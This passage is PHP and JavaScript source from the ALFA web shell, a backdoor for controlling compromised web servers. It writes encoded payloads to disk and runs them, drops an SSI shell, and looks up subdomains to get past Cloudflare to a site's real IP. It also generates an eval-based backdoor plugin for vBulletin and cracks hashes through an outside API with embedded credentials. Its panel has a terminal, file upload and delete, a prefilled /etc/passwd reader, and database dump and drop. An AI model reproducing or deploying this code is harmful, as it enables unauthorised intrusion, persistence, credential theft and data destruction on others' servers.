            $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
            $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
            $tmp_path = alfaWriteTocgiapi("getheader.alfa", $bash);
            $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa", false, true, true);
            if (@is_array(@json_decode($data, true))) {
                __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
                echo $data;
            }
        } else {
            echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
        }
    }
    function alfassiShell()
    {
        alfahead();
        echo "<div class=header>";
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        @mkdir('alfa_shtml', 0755);
        @chdir('alfa_shtml');
        alfacgihtaccess('shtml');
        $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
        @__write_file('alfa_ssi.shtml', __get_resource($code));
        @chmod("alfa_ssi.shtml", 0755);
        echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
        echo "</div>";
        alfafooter();
    }
    function alfacloudflare()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
        echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>\r\n<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
        if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
            $url = $_POST['alfa1'];
            if (!preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url)) {
                $url = preg_replace('/^(https?):\\/\\//', '', $url);
                $url = "http://www." . $url;
            }
            $headers = @get_headers($url, 1);
            $server = $headers['Server'];
            $subs = array('owa.', '2tty.', 'm.', 'gw.', 'mx1.', 'store.', '1', '2', 'vb.', 'news.', 'download.', 'video', 'cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.', 'search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.', 'books.', 'answers.', 'service.', 'groups.', 'images.', 'upload.', 'up.', 'tube.', 'users.', 'admin.', 'administrator.', 'private.', 'design.', 'whmcs.', 'wp.', 'wordpress.', 'joomla.', 'vbulletin.', 'test.', 'developer.', 'panel.', 'contact.');
            if (preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url, $matches)) {
                if ($matches[2] != 'www') {
                    $url = preg_replace('/^(https?):\\/\\//', '', $url);
                } else {
                    $url = explode($matches[0], $url);
                    $url = $url[1];
                }
            }
            if (is_array($server)) {
                $server = $server[0];
            }
            echo __pre();
            if (preg_match('/cloudflare/i', $server)) {
                echo "\n[+] CloudFlare detected: {$server}\n<br>";
            } else {
                echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
            }
            echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
            echo "[+] Searching for more IP addresses.\n\n<br><br>";
            for ($x = 0; $x < count($subs); $x++) {
                $site = $subs[$x] . $url;
                $ip = is_ipv4(gethostbyname($site));
                if ($ip == '(Null)') {
                    continue;
                }
                echo "Trying {$site}: {$ip}\n<br>";
            }
            echo "\n[+] Finished.\n<br>";
        }
        echo "</div>";
        alfafooter();
    }
    function is_ipv4($ip)
    {
        return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
    }
    function __alert($s)
    {
        echo '<center>' . __pre() . $s . '</center>';
    }
    function create_table($data)
    {
        echo "<table border=\"1\">";
        foreach ($data as $key => $val) {
            $array = array();
            foreach ($val as $k => $v) {
                $array[$k] = $v;
            }
            echo "<tr><td><div class='tbltxt'>" . $array['tdName'] . "</div></td><td><input type='text' id='" . $array['id'] . "' name='" . $array['inputName'] . "' " . ($array['placeholder'] ? 'placeholder' : 'value') . "='" . $array['inputValue'] . "' size='" . $array['inputSize'] . "' " . ($array['disabled'] ? 'disabled' : '') . "></td></tr>";
        }
        echo "</table>";
    }
    function alfaphp2xml()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
        echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>\r\n<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>\r\n<input type='submit' name='go' value=' ' /></p></form></center>";
        if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
            echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>";
            echo '<?php xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\'' . __ZW5jb2Rlcg($_POST['alfa1']) . '\'));exit;}]]></phpcode></plugin></plugins>';
            echo "</textarea></center></p>";
        }
        echo "</center></div>";
        alfafooter();
    }
    function alfacpcrack()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick=\"g('cpcrack',null,'dec')\">| DeCrypter | </a><a href=javascript:void(0) onclick=\"g('cpcrack',null,'analyzer')\">| Hash Analyzer | </a></h3></center>";
        if ($_POST['alfa1'] == 'dec') {
            $algorithms = array('md5' => 'MD5', 'md4' => 'MD4', 'sha1' => 'SHA1', 'sha256' => 'SHA256', 'sha384' => 'SHA384', 'sha512' => 'SHA512', 'ntlm' => 'NTLM');
            echo "<center><div class=\"txtfont_header\">| DeCrypter |</div><br><br>\r\n<form onsubmit=\"g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;\"><div class=\"txtfont\">Decrypt Method:</div> <select name=\"alg\" style=\"width:100px;\">";
            foreach ($algorithms as $key => $val) {
                echo '<option value="' . $key . '">' . $val . '</option>';
            }
            echo "</select><input type=\"text\" placeholder=\"Hash\" name=\"md5\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
            if ($_POST['alfa3'] == '>>') {
                $hash = $_POST['alfa2'];
                if (!empty($hash)) {
                    $hash_type = $_POST['alfa4'];
                    $email = "solevisible@gmail.com";
                    $code = "7b9fa79f92c3cd96";
                    $target = "https://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code;
                    $resp = @file_get_contents($target);
                    if ($resp == '') {
                        $get = new AlfaCURL();
                        $resp = $get->Send($target);
                    }
                    echo __pre() . '<center>';
                    switch ($resp) {
                        case 'CODE ERREUR : 001':
                            echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
                            break;
                        case 'CODE ERREUR : 003':
                            echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
                            break;
                        case 'CODE ERREUR : 004':
                            echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
                            break;
                        case 'CODE ERREUR : 005':
                            echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
                            break;
                    }
                    if (substr($resp, 0, 4) != 'CODE' && $resp != '') {
                        echo "<b>Result: <font color='green'>" . $resp . "</font></b>";
                    } elseif (substr($resp, 0, 4) != 'CODE') {
                        echo "<font color='red'>NoT Found</font><br />";
                    }
                    echo "</center>";
                }
            }
        }
        if ($_POST['alfa1'] == 'analyzer') {
            echo "<center><p><div class=\"txtfont_header\">| Hash Analyzer |</div></p>\r\n<form onsubmit=\"g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;\">\r\n<div class=\"txtfont\">Hash: </div> <input type=\"text\" placeholder=\"Hash\" name=\"hash\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
            if ($_POST['alfa3'] == '>>') {
                $hash = $_POST['alfa2'];
                if (!empty($hash)) {
                    $curl = new AlfaCURL();
                    $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search");
                    echo __pre() . '<center>';
                    if (preg_match('#<fieldset class="trouve">(.*?)</fieldset>#', $resp, $s)) {
                        echo '<font color="green">' . $s[1] . '</font>';
                    } else {
                        echo "<font color=\"red\">Not Found...!</font>";
                    }
                    echo "</center><br>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfafooter()
    {
        if (!isset($_POST['ajax'])) {
            echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >\r\n<tr>\r\n<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>\r\n<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>\r\n<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>\r\n<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS['cwd']) . "'> <input type='submit' value=' '></form></td>\r\n<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>\r\n<input type='hidden' name='a' value='FilesMAn'>\r\n<input type='hidden' name='c' value='" . $GLOBALS['cwd'] . "'>\r\n<input type='hidden' name='ajax' value='true'>\r\n<input type='hidden' name='alfa1' value='uploadFile'>\r\n<input type='hidden' name='charset' value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date('Y') . " ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>\r\n</tr>\r\n</table>\r\n</div>\r\n\r\n<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>\r\n\r\n<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>\r\n\r\n<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>\r\n<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>\r\n<div id='update-content'></div>\r\n<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>\r\n<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>\r\n<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>\r\n<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>\r\n<div id='rightclick_menu'>\r\n  <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>\r\n  <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>\r\n  <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>\r\n  <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>\r\n  <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\">  Rename</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\">  Modify</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>\r\n  <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>\r\n</div>\r\n<div id=\"filesman-tab-full-path\"></div>\r\n<div id='alert-area' class='alert-area'></div>\r\n<div class='cl-popup-fixed' style='display:none;'>\r\n\t<div id='shortcutMenu-holder'>\r\n\t\t<div class='popup-head'></div>\r\n\t\t\t<form autocomplete='off' onSubmit='return false;'>\r\n\t\t\t\t<label class='old-path-lbl'></label>\r\n\t\t\t\t<div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>\r\n\t\t\t\t<label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>\r\n\t\t\t\t<input type='text' name='fname'>\r\n\t\t\t\t<div class='perm-table-holder'>\r\n\t\t\t\t\t<table>\r\n\t\t\t\t\t   <tbody>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td><b>Mode</b></td>\r\n\t\t\t\t\t         <td>User</td>\r\n\t\t\t\t\t         <td>Group</td>\r\n\t\t\t\t\t         <td>World</td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Read</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Write</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Execute</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Permission</td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t   </tbody>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\r\n\t\t\t</form>\r\n\t\t<div class='popup-foot'>\r\n\t\t\t<button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>\r\n\t\t\t<button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>\r\n\t\t</div>\r\n\t</div>\r\n</div>";
            ?>
<script>
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function 